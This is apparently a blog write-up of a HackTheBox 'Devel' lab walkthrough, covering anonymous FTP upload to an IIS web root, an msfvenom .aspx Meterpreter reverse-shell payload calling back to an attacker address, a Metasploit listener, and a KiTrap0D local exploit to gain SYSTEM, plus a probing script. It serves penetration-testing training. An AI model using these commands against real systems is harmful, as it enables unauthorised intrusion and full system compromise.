Devel Hackthebox

A breakdown of IppSec's YouTube video HackTheBox - Devel: a Windows box that is completed entirely within Metasploit, using the standard commands you would use to enumerate a box and interact with a session. A great Metasploit refresher.


Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series will contain comprehensive write-ups of HackTheBox machines, in an effort to sharpen reporting techniques and help solidify the understanding and methodologies used during penetration testing.

Enumeration

nmap scan:

nmap -sC -sV -oA nmap 10.10.10.5

(results)

FTP is open, which is interesting; HTTP is open too, which is unremarkable on its own.

The default IIS landing page is served. Looking at the image it references, the file is named “welcome.png”, which is one of the file names listed in the FTP directory.

Checking out /iisstart.htm, which is the main index page:

The FTP root and the web root are most likely the same directory, so anything uploaded over FTP should be reachable over HTTP.

FTP to the open port:

ftp 10.10.10.5
username: anonymous
password: anything

Create a test file locally:

echo ippsec > test

“put” the file on the FTP server:

put test

The file uploads successfully to the FTP server.

Viewing the uploaded file

When the file is requested via the web server, a file name without an extension returns a 404. If the extension is changed to .html, a 200 response is returned.

mv test test.html

Upload it:

put test.html

The web server now returns a 200 response and displays the contents of test.html, which confirms that files dropped on the FTP share are served over HTTP.

Burp Suite

Keep in mind that IIS executes server-side code in files with .asp or .aspx extensions, so an upload with one of those extensions is the goal, rather than a static .html file.

Intercept the request with Burp.

Send the intercepted request to Repeater (ctrl+r).

The Server header reports IIS 7.5,

which corresponds to Windows 7 and Windows Server 2008 R2. Thought process: classic .asp is based on VBScript, while .aspx is ASP.NET (.NET Framework), which is the more likely option on an IIS 7.5 host.
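The manual test above (upload a marker over anonymous FTP, request it over HTTP, compare status codes per extension) can be scripted so that it also tells served apart from executed. The following is an added example, not code from IppSec's video or the write-up: for .asp/.aspx it uploads a tiny page that evaluates 6*7 server-side, so a "42" in the response proves the extension is executed, whereas getting the raw tag back means it is only served as text. HOST, the curl flags used for FTP, and the assumption that the FTP root is the web root are placeholders/assumptions, not facts from the page.

```shell
#!/bin/sh
# Added example (not from the write-up): confirm that the anonymous FTP root is
# the IIS web root and learn which extensions are not served, served, or executed.
# Assumptions: HOST is a placeholder, curl is installed, the FTP server allows
# anonymous writes, and the FTP root is the web root.

HOST="${HOST:-10.10.10.5}"
MARK="probe$$"

# Body uploaded for each extension. For .asp/.aspx the server-side tag
# evaluates 6*7: "42" in the response means the extension is executed,
# the raw tag in the response means it is merely served as text.
probe_body() {
  case "$1" in
    ""|txt|html) printf '%s\n' "$MARK" ;;
    asp)         printf '<%%= 6*7 %%>\n' ;;
    aspx)        printf '<%%@ Page Language="C#" %%><%%= 6*7 %%>\n' ;;
    *)           return 1 ;;
  esac
}

# Pure function: turn (extension, HTTP status, response body) into a verdict.
# 404 is what the write-up saw for the extension-less file; 200 for .html.
classify() {
  ext="$1"; status="$2"; body="$3"
  case "$status" in
    200) ;;
    404) echo "not-served"; return 0 ;;
    *)   echo "http-$status"; return 0 ;;
  esac
  case "$ext" in
    asp|aspx) case "$body" in *42*) echo "executed" ;; *) echo "served" ;; esac ;;
    *)        echo "served" ;;
  esac
}

# Upload one marker over FTP, fetch it over HTTP, print the verdict, clean up.
probe() {
  ext="$1"
  f="$MARK${ext:+.$ext}"
  probe_body "$ext" > "$f"
  # anonymous FTP upload (same as "put" in the ftp client)
  curl -s -T "$f" "ftp://$HOST/" --user anonymous:anon@example.com >/dev/null
  # -w appends the status code on its own line after the body
  resp=$(curl -s -w '\n%{http_code}' "http://$HOST/$f")
  status=$(printf '%s\n' "$resp" | tail -n 1)
  body=$(printf '%s\n' "$resp" | sed '$d')
  printf '%-5s %s %s\n' "${ext:-none}" "$status" "$(classify "$ext" "$status" "$body")"
  # remove the marker from the server (DELE sent as a curl quote command) and locally
  curl -s -Q "DELE $f" "ftp://$HOST/" --user anonymous:anon@example.com >/dev/null
  rm -f "$f"
}

# Only touch the network when explicitly asked: ./probe.sh run
if [ "${1:-}" = "run" ]; then
  for e in "" txt html asp aspx; do probe "$e"; done
fi
```

Run it with `HOST=10.10.10.5 sh probe.sh run`; one line per extension is printed, e.g. `none 404 not-served` or `aspx 200 executed`. An `http-500` verdict on .asp/.aspx is also informative: the server tried to execute the file, so the extension is handled, and the error text is worth reading. The cleanup step relies on anonymous delete being allowed; if it is not, remove the markers by hand with `delete` in the ftp client so the share is left as you found it.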

msfvenom

msfvenom -h

Flags that will be used: -p = payload, -f = format, -o = output file.

List msfvenom payloads:

msfvenom -l | grep windows

Be cognizant of the payload architecture: a 32-bit (x86) payload and a 64-bit (x64) payload are not interchangeable, and the one chosen has to match the process it will run in.

List msfvenom formats:

msfvenom --help-formats

Set up the payload:

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o ippsec.aspx

This creates an .aspx file that loads Meterpreter when the page is requested.

Viewing the file created:

less ippsec.aspx

The shellcode blob inside it is what IppSec refers to as “the magic”!

Upload the payload

On the FTP server:

put ippsec.aspx

Load msfconsole/listener

msfdb run # first-time run: initializes and starts the PostgreSQL database, then launches msfconsole
msfconsole # normal start without the database

use exploit/multi/handler
show options

Set the payload:

set payload windows/meterpreter/reverse_tcp # the same one chosen in msfvenom
show options

Set LHOST to the local (VPN) IP address:

set LHOST tun0 # or the interface name; msfconsole resolves it to that interface's address
run

Recreating the payload with host/port

The first payload was created without LHOST and LPORT, so it had nowhere to connect back to. Regenerate it with the same values the handler is using:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f aspx -o ippsec.aspx

Re-upload to the FTP server:

put ippsec.aspx

response:

After requesting ippsec.aspx through the web server, a Meterpreter session is opened on the handler.

Metasploit interaction with shell

To interact with the session:

sessions -i 1

First step:

sysinfo

Check the architecture, which is x86.

shell
systeminfo # inside the Windows shell

Normally this lists the installed hotfixes, but here it says N/A, which could mean the machine has never been updated. Also keep in mind the boot time and the Service Pack level.

Metasploit exploit suggester

Background the current session (background in Meterpreter) and search for a suggester module:

search suggest

Use local_exploit_suggester:

use post/multi/recon/local_exploit_suggester
show options

Set SESSION to the current session:

set SESSION 1
run

Since this box has not been updated since release (Windows 7 / Server 2008 R2 shipped in 2009), any of the exploits the suggester returns might work.

Choosing the first exploit, ms10-015 (KiTrap0D):

use exploit/windows/local/ms10_015_kitrap0d
show options

set SESSION 1
show options # second time, to verify that the session was added

run

Since no payload was set for this module, Metasploit defaulted to *windows/meterpreter/reverse_tcp*, but with an LHOST and LPORT that were not the ones the handler is using, so the callback could not come back.

set LHOST 10.10.14.17
run

An error occurred and the box crashed, so he redid all the steps up to this point and re-ran the exploit.

Connect to the shell:

shell
whoami

Now operating as NT AUTHORITY\SYSTEM!

#HAILippsec


If you don’t know who IppSec is check him out at:

Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
Twitter: https://twitter.com/ippsec